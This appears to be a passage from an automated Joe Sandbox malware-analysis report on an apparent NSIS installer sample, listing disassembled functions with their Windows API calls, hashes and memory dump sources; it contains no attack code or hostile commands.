                                                                                                                                                                                                                                                                                            • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                            • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                            Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                            • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                            • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                            Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                                            • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                            • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                            • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                            Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                            • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                            Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                            • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                                            Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                            • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                            Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                            • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                            Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                            • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                            Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                            • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                            Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                            • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                            Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                            • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                            Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
